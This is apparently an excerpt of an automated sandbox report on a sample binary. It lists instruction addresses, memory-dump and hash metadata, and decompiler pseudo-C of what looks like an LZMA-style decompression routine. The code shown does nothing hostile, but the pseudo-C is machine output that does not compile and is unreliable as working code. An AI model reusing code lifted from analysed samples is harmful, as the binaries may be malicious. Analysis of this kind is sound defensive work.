                0x00406770
                0x00406773
                0x00406775
                0x00406777
                0x0040677a
                0x0040677c
                0x0040677f
                0x00406783
                0x00406785
                0x00406785
                0x00406786
                0x00406789
                0x0040678c
                0x0040674e
                0x0040674e
                0x00406756
                0x0040675b
                0x0040675d
                0x00406760
                0x00406760
                0x0040678f
                0x00406796
                0x00406720
                0x00406720
                0x00406720
                0x00406720
                0x00000000
                0x00406798
                0x00000000
                0x00406798
                0x00406796
                0x004066a9
                0x004066ac
                0x004066ae
                0x004066b1
                0x004066b4
                0x004066b7
                0x004066b9
                0x004066bc
                0x004066bf
                0x004066bf
                0x004066c2
                0x004066c2
                0x004066c5
                0x004066cc
                0x004066a0
                0x004066a0
                0x004066a0
                0x004066a0
                0x00000000
                0x004066ce
                0x00000000
                0x004066ce
                0x004066cc
                0x00406652
                0x00406655
                0x00406657
                0x0040665a
                0x00000000
                0x00000000
                0x004063b9
                0x004063b9
                0x004063bd
                0x00406a02
                0x00000000
                0x00406a02
                0x004063c3
                0x004063c6
                0x004063c9
                0x004063cc
                0x004063cf
                0x004063d2
                0x004063d5
                0x004063d7
                0x004063da
                0x004063dd
                0x004063e0
                0x004063e2
                0x004063e2
                0x004063e2
                0x00000000
                0x00000000
                0x00406544
                0x00406544
                0x00406548
                0x00406a0e
                0x00000000
                0x00406a0e
                0x0040654e
                0x00406551
                0x00406554
                0x00406557
                0x00406559
                0x00406559
                0x00406559
                0x0040655c
                0x0040655f
                0x00406562
                0x00406565
                0x00406568
                0x0040656b
                0x0040656c
                0x0040656e
                0x0040656e
                0x0040656e
                0x00406571
                0x00406574
                0x00406577
                0x0040657a
                0x0040657a
                0x0040657a
                0x0040657d
                0x0040657f
                0x0040657f
                0x00000000
                0x00000000
                0x004067c1
                0x004067c1
                0x004067c1
                0x004067c5
                0x00000000
                0x00000000
                0x004067cb
                0x004067ce
                0x004067d1
                0x004067d4
                0x004067d6
                0x004067d6
                0x004067d6
                0x004067d9
                0x004067dc
                0x004067df
                0x004067e2
                0x004067e5
                0x004067e8
                0x004067e9
                0x004067eb
                0x004067eb
                0x004067eb
                0x004067ee
                0x004067f1
                0x004067f4
                0x004067f7
                0x004067fa
                0x004067fe
                0x00406800
                0x00406803
                0x00000000
                0x00406805
                0x00406582
                0x00406582
                0x00000000
                0x00406582
                0x00406803
                0x00406a38
                0x00406a5a
                0x00406a60
                0x00406a62
                0x00406a69
                0x00406a6b
                0x00406a72
                0x00406a76
                0x00000000
                0x00406067
                0x00406a6f
                0x00406a6f
                0x00000000
                0x00406a6f
                0x004068bc
                0x00406942
                0x00406948
                0x0040694b
                0x0040694e
                0x00406951
                0x00406954
                0x00406957
                0x0040695a
                0x0040695d
                0x00406963
                0x0040697c
                0x0040697f
                0x00406982
                0x00406985
                0x00406989
                0x0040698b
                0x0040698c
                0x0040698f
                0x00406965
                0x00406965
                0x0040696d
                0x00406972
                0x00406974
                0x00406977
                0x00406977
                0x00406999
                0x00000000
                0x0040699b
                0x00000000
                0x0040699b
                0x00406999
                0x00000000
                0x0040680e

                Memory Dump Source
                • Source File: 00000008.00000002.289929586.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000008.00000002.289868632.0000000000400000.00000002.00020000.sdmp Download File
                • Associated: 00000008.00000002.289964819.0000000000407000.00000002.00020000.sdmp Download File
                • Associated: 00000008.00000002.290014852.0000000000409000.00000004.00020000.sdmp Download File
                • Associated: 00000008.00000002.290078414.0000000000417000.00000004.00020000.sdmp Download File
                • Associated: 00000008.00000002.290084814.0000000000422000.00000004.00020000.sdmp Download File
                • Associated: 00000008.00000002.290095675.000000000042A000.00000004.00020000.sdmp Download File
                • Associated: 00000008.00000002.290154899.000000000042D000.00000002.00020000.sdmp Download File
                • Associated: 00000008.00000002.290281669.000000000043D000.00000002.00020000.sdmp Download File
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: b90b51789b68cdbba6ca9369e5ad938c532d61a1d7775d6d72ffdff9632d9f26
                • Instruction ID: c9a91825e94b1235ed1e5db661991067e3a312009d26920905f6c04b87fbb156
                • Opcode Fuzzy Hash: b90b51789b68cdbba6ca9369e5ad938c532d61a1d7775d6d72ffdff9632d9f26
                • Instruction Fuzzy Hash: 25913F71E00228CFDF28DFA8C8547ADBBB1FB44305F15816AD916BB291C3789A96DF44
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00406520, Relevance: 5.2, APIs: 4, Instructions: 205COMMON
                Download Yara Rule
                C-Code - Quality: 98%
                			E00406520() {
				unsigned short _t532;
				signed int _t533;
				void _t534;
				void* _t535;
				signed int _t536;
				signed int _t565;
				signed int _t568;
				signed int _t589;
				signed int* _t606;
				void* _t613;

				L0:
				while(1) {
					L0:
					if( *(_t613 - 0x40) != 0) {
						L89:
						 *((intOrPtr*)(_t613 - 0x80)) = 0x15;
						 *(_t613 - 0x58) =  *(_t613 - 4) + 0xa68;
						L69:
						_t606 =  *(_t613 - 0x58);
						 *(_t613 - 0x84) = 0x12;
						L132:
						 *(_t613 - 0x54) = _t606;
						L133:
						_t532 =  *_t606;
						_t589 = _t532 & 0x0000ffff;
						_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
						if( *(_t613 - 0xc) >= _t565) {
							 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
							 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
							 *(_t613 - 0x40) = 1;
							_t533 = _t532 - (_t532 >> 5);
							 *_t606 = _t533;
						} else {
							 *(_t613 - 0x10) = _t565;
							 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
							 *_t606 = (0x800 - _t589 >> 5) + _t532;
						}
						if( *(_t613 - 0x10) >= 0x1000000) {
							L139:
							_t534 =  *(_t613 - 0x84);
							L140:
							 *(_t613 - 0x88) = _t534;
							goto L1;
						} else {
							L137:
							if( *(_t613 - 0x6c) == 0) {
								 *(_t613 - 0x88) = 5;
								goto L170;
							}
							 *(_t613 - 0x10) =  *(_t613 - 0x10) << 8;
							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
							 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
							 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
							goto L139;
						}
					} else {
						if( *(__ebp - 0x60) == 0) {
							L171:
							_t536 = _t535 | 0xffffffff;
							L172:
							return _t536;
						}
						__eax = 0;
						_t258 =  *(__ebp - 0x38) - 7 >= 0;
						0 | _t258 = _t258 + _t258 + 9;
						 *(__ebp - 0x38) = _t258 + _t258 + 9;
						L75:
						if( *(__ebp - 0x64) == 0) {
							 *(__ebp - 0x88) = 0x1b;
							L170:
							_t568 = 0x22;
							memcpy( *(_t613 - 0x90), _t613 - 0x88, _t568 << 2);
							_t536 = 0;
							goto L172;
						}
						__eax =  *(__ebp - 0x14);
						__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
						if(__eax >=  *(__ebp - 0x74)) {
							__eax = __eax +  *(__ebp - 0x74);
						}
						__edx =  *(__ebp - 8);
						__cl =  *(__eax + __edx);
						__eax =  *(__ebp - 0x14);
						 *(__ebp - 0x5c) = __cl;
						 *(__eax + __edx) = __cl;
						__eax = __eax + 1;
						__edx = 0;
						_t274 = __eax %  *(__ebp - 0x74);
						__eax = __eax /  *(__ebp - 0x74);
						__edx = _t274;
						__eax =  *(__ebp - 0x68);
						 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
						 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
						_t283 = __ebp - 0x64;
						 *_t283 =  *(__ebp - 0x64) - 1;
						 *( *(__ebp - 0x68)) = __cl;
						L79:
						 *(__ebp - 0x14) = __edx;
						L80:
						 *(__ebp - 0x88) = 2;
					}
					L1:
					_t535 =  *(_t613 - 0x88);
					if(_t535 > 0x1c) {
						goto L171;
					}
					switch( *((intOrPtr*)(_t535 * 4 +  &M00406A77))) {
						case 0:
							if( *(_t613 - 0x6c) == 0) {
								goto L170;
							}
							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
							 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
							_t535 =  *( *(_t613 - 0x70));
							if(_t535 > 0xe1) {
								goto L171;
							}
							_t539 = _t535 & 0x000000ff;
							_push(0x2d);
							asm("cdq");
							_pop(_t570);
							_push(9);
							_pop(_t571);
							_t609 = _t539 / _t570;
							_t541 = _t539 % _t570 & 0x000000ff;
							asm("cdq");
							_t604 = _t541 % _t571 & 0x000000ff;
							 *(_t613 - 0x3c) = _t604;
							 *(_t613 - 0x1c) = (1 << _t609) - 1;
							 *((intOrPtr*)(_t613 - 0x18)) = (1 << _t541 / _t571) - 1;
							_t612 = (0x300 << _t604 + _t609) + 0x736;
							if(0x600 ==  *((intOrPtr*)(_t613 - 0x78))) {
								L10:
								if(_t612 == 0) {
									L12:
									 *(_t613 - 0x48) =  *(_t613 - 0x48) & 0x00000000;
									 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
									goto L15;
								} else {
									goto L11;
								}
								do {
									L11:
									_t612 = _t612 - 1;
									 *((short*)( *(_t613 - 4) + _t612 * 2)) = 0x400;
								} while (_t612 != 0);
								goto L12;
							}
							if( *(_t613 - 4) != 0) {
								GlobalFree( *(_t613 - 4));
							}
							_t535 = GlobalAlloc(0x40, 0x600); // executed
							 *(_t613 - 4) = _t535;
							if(_t535 == 0) {
								goto L171;
							} else {
								 *((intOrPtr*)(_t613 - 0x78)) = 0x600;
								goto L10;
							}
						case 1:
							L13:
							__eflags =  *(_t613 - 0x6c);
							if( *(_t613 - 0x6c) == 0) {
								 *(_t613 - 0x88) = 1;
								goto L170;
							}
							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
							 *(_t613 - 0x40) =  *(_t613 - 0x40) | ( *( *(_t613 - 0x70)) & 0x000000ff) <<  *(_t613 - 0x48) << 0x00000003;
							 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
							_t45 = _t613 - 0x48;
							 *_t45 =  *(_t613 - 0x48) + 1;
							__eflags =  *_t45;
							L15:
							if( *(_t613 - 0x48) < 4) {
								goto L13;
							}
							_t547 =  *(_t613 - 0x40);
							if(_t547 ==  *(_t613 - 0x74)) {
								L20:
								 *(_t613 - 0x48) = 5;
								 *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) =  *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) & 0x00000000;
								goto L23;
							}
							 *(_t613 - 0x74) = _t547;
							if( *(_t613 - 8) != 0) {
								GlobalFree( *(_t613 - 8)); // executed
							}
							_t535 = GlobalAlloc(0x40,  *(_t613 - 0x40)); // executed
							 *(_t613 - 8) = _t535;
							if(_t535 == 0) {
								goto L171;
							} else {
								goto L20;
							}
						case 2:
							L24:
							_t554 =  *(_t613 - 0x60) &  *(_t613 - 0x1c);
							 *(_t613 - 0x84) = 6;
							 *(_t613 - 0x4c) = _t554;
							_t606 =  *(_t613 - 4) + (( *(_t613 - 0x38) << 4) + _t554) * 2;
							goto L132;
						case 3:
							L21:
							__eflags =  *(_t613 - 0x6c);
							if( *(_t613 - 0x6c) == 0) {
								 *(_t613 - 0x88) = 3;
								goto L170;
							}
							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
							_t67 = _t613 - 0x70;
							 *_t67 =  &(( *(_t613 - 0x70))[1]);
							__eflags =  *_t67;
							 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
							L23:
							 *(_t613 - 0x48) =  *(_t613 - 0x48) - 1;
							if( *(_t613 - 0x48) != 0) {
								goto L21;
							}
							goto L24;
						case 4:
							goto L133;
						case 5:
							goto L137;
						case 6:
							__edx = 0;
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 4);
								__ecx =  *(__ebp - 0x38);
								 *(__ebp - 0x34) = 1;
								 *(__ebp - 0x84) = 7;
								__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
								goto L132;
							}
							__eax =  *(__ebp - 0x5c) & 0x000000ff;
							__esi =  *(__ebp - 0x60);
							__cl = 8;
							__cl = 8 -  *(__ebp - 0x3c);
							__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
							__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
							__ecx =  *(__ebp - 0x3c);
							__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
							__ecx =  *(__ebp - 4);
							(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
							__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
							__eflags =  *(__ebp - 0x38) - 4;
							__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
							 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
							if( *(__ebp - 0x38) >= 4) {
								__eflags =  *(__ebp - 0x38) - 0xa;
								if( *(__ebp - 0x38) >= 0xa) {
									_t98 = __ebp - 0x38;
									 *_t98 =  *(__ebp - 0x38) - 6;
									__eflags =  *_t98;
								} else {
									 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
								}
							} else {
								 *(__ebp - 0x38) = 0;
							}
							__eflags =  *(__ebp - 0x34) - __edx;
							if( *(__ebp - 0x34) == __edx) {
								__ebx = 0;
								__ebx = 1;
								goto L61;
							} else {
								__eax =  *(__ebp - 0x14);
								__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
								__eflags = __eax -  *(__ebp - 0x74);
								if(__eax >=  *(__ebp - 0x74)) {
									__eax = __eax +  *(__ebp - 0x74);
									__eflags = __eax;
								}
								__ecx =  *(__ebp - 8);
								__ebx = 0;
								__ebx = 1;
								__al =  *((intOrPtr*)(__eax + __ecx));
								 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
								goto L41;
							}
						case 7:
							__eflags =  *(__ebp - 0x40) - 1;
							if( *(__ebp - 0x40) != 1) {
								__eax =  *(__ebp - 0x24);
								 *(__ebp - 0x80) = 0x16;
								 *(__ebp - 0x20) =  *(__ebp - 0x24);
								__eax =  *(__ebp - 0x28);
								 *(__ebp - 0x24) =  *(__ebp - 0x28);
								__eax =  *(__ebp - 0x2c);
								 *(__ebp - 0x28) =  *(__ebp - 0x2c);
								__eax = 0;
								__eflags =  *(__ebp - 0x38) - 7;
								0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
								__al = __al & 0x000000fd;
								__eax = (__eflags >= 0) - 1 + 0xa;
								 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
								__eax =  *(__ebp - 4);
								__eax =  *(__ebp - 4) + 0x664;
								__eflags = __eax;
								 *(__ebp - 0x58) = __eax;
								goto L69;
							}
							__eax =  *(__ebp - 4);
							__ecx =  *(__ebp - 0x38);
							 *(__ebp - 0x84) = 8;
							__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
							goto L132;
						case 8:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 4);
								__ecx =  *(__ebp - 0x38);
								 *(__ebp - 0x84) = 0xa;
								__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
							} else {
								__eax =  *(__ebp - 0x38);
								__ecx =  *(__ebp - 4);
								__eax =  *(__ebp - 0x38) + 0xf;
								 *(__ebp - 0x84) = 9;
								 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
								__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
							}
							goto L132;
						case 9:
							goto L0;
						case 0xa:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 4);
								__ecx =  *(__ebp - 0x38);
								 *(__ebp - 0x84) = 0xb;
								__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
								goto L132;
							}
							__eax =  *(__ebp - 0x28);
							goto L88;
						case 0xb:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__ecx =  *(__ebp - 0x24);
								__eax =  *(__ebp - 0x20);
								 *(__ebp - 0x20) =  *(__ebp - 0x24);
							} else {
								__eax =  *(__ebp - 0x24);
							}
							__ecx =  *(__ebp - 0x28);
							 *(__ebp - 0x24) =  *(__ebp - 0x28);
							L88:
							__ecx =  *(__ebp - 0x2c);
							 *(__ebp - 0x2c) = __eax;
							 *(__ebp - 0x28) =  *(__ebp - 0x2c);
							goto L89;
						case 0xc:
							L99:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0xc;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t334 = __ebp - 0x70;
							 *_t334 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t334;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							__eax =  *(__ebp - 0x2c);
							goto L101;
						case 0xd:
							L37:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0xd;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t122 = __ebp - 0x70;
							 *_t122 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t122;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							L39:
							__eax =  *(__ebp - 0x40);
							__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
							if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
								goto L48;
							}
							__eflags = __ebx - 0x100;
							if(__ebx >= 0x100) {
								goto L54;
							}
							L41:
							__eax =  *(__ebp - 0x5b) & 0x000000ff;
							 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
							__ecx =  *(__ebp - 0x58);
							__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
							 *(__ebp - 0x48) = __eax;
							__eax = __eax + 1;
							__eax = __eax << 8;
							__eax = __eax + __ebx;
							__esi =  *(__ebp - 0x58) + __eax * 2;
							 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
							__ax =  *__esi;
							 *(__ebp - 0x54) = __esi;
							__edx = __ax & 0x0000ffff;
							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
							__eflags =  *(__ebp - 0xc) - __ecx;
							if( *(__ebp - 0xc) >= __ecx) {
								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
								__cx = __ax;
								 *(__ebp - 0x40) = 1;
								__cx = __ax >> 5;
								__eflags = __eax;
								__ebx = __ebx + __ebx + 1;
								 *__esi = __ax;
							} else {
								 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
								 *(__ebp - 0x10) = __ecx;
								0x800 = 0x800 - __edx;
								0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
								__ebx = __ebx + __ebx;
								 *__esi = __cx;
							}
							__eflags =  *(__ebp - 0x10) - 0x1000000;
							 *(__ebp - 0x44) = __ebx;
							if( *(__ebp - 0x10) >= 0x1000000) {
								goto L39;
							} else {
								goto L37;
							}
						case 0xe:
							L46:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0xe;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t156 = __ebp - 0x70;
							 *_t156 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t156;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							while(1) {
								L48:
								__eflags = __ebx - 0x100;
								if(__ebx >= 0x100) {
									break;
								}
								__eax =  *(__ebp - 0x58);
								__edx = __ebx + __ebx;
								__ecx =  *(__ebp - 0x10);
								__esi = __edx + __eax;
								__ecx =  *(__ebp - 0x10) >> 0xb;
								__ax =  *__esi;
								 *(__ebp - 0x54) = __esi;
								__edi = __ax & 0x0000ffff;
								__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
								__eflags =  *(__ebp - 0xc) - __ecx;
								if( *(__ebp - 0xc) >= __ecx) {
									 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
									 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
									__cx = __ax;
									_t170 = __edx + 1; // 0x1
									__ebx = _t170;
									__cx = __ax >> 5;
									__eflags = __eax;
									 *__esi = __ax;
								} else {
									 *(__ebp - 0x10) = __ecx;
									0x800 = 0x800 - __edi;
									0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
									__ebx = __ebx + __ebx;
									 *__esi = __cx;
								}
								__eflags =  *(__ebp - 0x10) - 0x1000000;
								 *(__ebp - 0x44) = __ebx;
								if( *(__ebp - 0x10) >= 0x1000000) {
									continue;
								} else {
									goto L46;
								}
							}
							L54:
							_t173 = __ebp - 0x34;
							 *_t173 =  *(__ebp - 0x34) & 0x00000000;
							__eflags =  *_t173;
							goto L55;
						case 0xf:
							L58:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0xf;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t203 = __ebp - 0x70;
							 *_t203 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t203;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							L60:
							__eflags = __ebx - 0x100;
							if(__ebx >= 0x100) {
								L55:
								__al =  *(__ebp - 0x44);
								 *(__ebp - 0x5c) =  *(__ebp - 0x44);
								goto L56;
							}
							L61:
							__eax =  *(__ebp - 0x58);
							__edx = __ebx + __ebx;
							__ecx =  *(__ebp - 0x10);
							__esi = __edx + __eax;
							__ecx =  *(__ebp - 0x10) >> 0xb;
							__ax =  *__esi;
							 *(__ebp - 0x54) = __esi;
							__edi = __ax & 0x0000ffff;
							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
							__eflags =  *(__ebp - 0xc) - __ecx;
							if( *(__ebp - 0xc) >= __ecx) {
								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
								__cx = __ax;
								_t217 = __edx + 1; // 0x1
								__ebx = _t217;
								__cx = __ax >> 5;
								__eflags = __eax;
								 *__esi = __ax;
							} else {
								 *(__ebp - 0x10) = __ecx;
								0x800 = 0x800 - __edi;
								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
								__ebx = __ebx + __ebx;
								 *__esi = __cx;
							}
							__eflags =  *(__ebp - 0x10) - 0x1000000;
							 *(__ebp - 0x44) = __ebx;
							if( *(__ebp - 0x10) >= 0x1000000) {
								goto L60;
							} else {
								goto L58;
							}
						case 0x10:
							L109:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0x10;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t365 = __ebp - 0x70;
							 *_t365 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t365;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							goto L111;
						case 0x11:
							goto L69;
						case 0x12:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 0x58);
								 *(__ebp - 0x84) = 0x13;
								__esi =  *(__ebp - 0x58) + 2;
								goto L132;
							}
							__eax =  *(__ebp - 0x4c);
							 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
							__ecx =  *(__ebp - 0x58);
							__eax =  *(__ebp - 0x4c) << 4;
							__eflags = __eax;
							__eax =  *(__ebp - 0x58) + __eax + 4;
							goto L130;
						case 0x13:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								_t469 = __ebp - 0x58;
								 *_t469 =  *(__ebp - 0x58) + 0x204;
								__eflags =  *_t469;
								 *(__ebp - 0x30) = 0x10;
								 *(__ebp - 0x40) = 8;
								L144:
								 *(__ebp - 0x7c) = 0x14;
								goto L145;
							}
							__eax =  *(__ebp - 0x4c);
							__ecx =  *(__ebp - 0x58);
							__eax =  *(__ebp - 0x4c) << 4;
							 *(__ebp - 0x30) = 8;
							__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
							L130:
							 *(__ebp - 0x58) = __eax;
							 *(__ebp - 0x40) = 3;
							goto L144;
						case 0x14:
							 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
							__eax =  *(__ebp - 0x80);
							goto L140;
						case 0x15:
							__eax = 0;
							__eflags =  *(__ebp - 0x38) - 7;
							0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
							__al = __al & 0x000000fd;
							__eax = (__eflags >= 0) - 1 + 0xb;
							 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
							goto L120;
						case 0x16:
							__eax =  *(__ebp - 0x30);
							__eflags = __eax - 4;
							if(__eax >= 4) {
								_push(3);
								_pop(__eax);
							}
							__ecx =  *(__ebp - 4);
							 *(__ebp - 0x40) = 6;
							__eax = __eax << 7;
							 *(__ebp - 0x7c) = 0x19;
							 *(__ebp - 0x58) = __eax;
							goto L145;
						case 0x17:
							L145:
							__eax =  *(__ebp - 0x40);
							 *(__ebp - 0x50) = 1;
							 *(__ebp - 0x48) =  *(__ebp - 0x40);
							goto L149;
						case 0x18:
							L146:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0x18;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t484 = __ebp - 0x70;
							 *_t484 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t484;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							L148:
							_t487 = __ebp - 0x48;
							 *_t487 =  *(__ebp - 0x48) - 1;
